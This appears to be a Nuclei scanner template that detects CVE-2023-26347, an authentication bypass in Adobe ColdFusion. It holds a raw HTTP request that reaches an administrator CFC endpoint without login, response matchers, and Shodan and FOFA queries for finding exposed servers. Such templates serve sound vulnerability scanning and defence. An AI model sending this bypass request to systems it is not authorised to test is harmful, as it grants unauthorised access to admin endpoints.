id: CVE-2023-26347 info: name: Adobe Coldfusion - Authentication Bypass author: salts severity: high description: | Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction. remediation: | Update to the latest version of Adobe Coldfusion reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-26347 - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-26347 cwe-id: CWE-284 epss-score: 0.00522 epss-percentile: 0.74346 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" tags: cve2023,cve,adobe,coldfusion,auth-bypass http: - raw: - | GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'wddxPacket version=' - '' condition: and - type: status status: - 200 # digest: 4a0a00473045022100cb9673e5cf15593d86fab1fedee0fff74aeaa24ecad9c6e54f5c5a19e015d47d02200f2ce80a4eb04fef3e46a1d1cd94e54865c99ed81c53071ad8e36e31c947f7f5:922c64590222798bb761d5b6d8e72950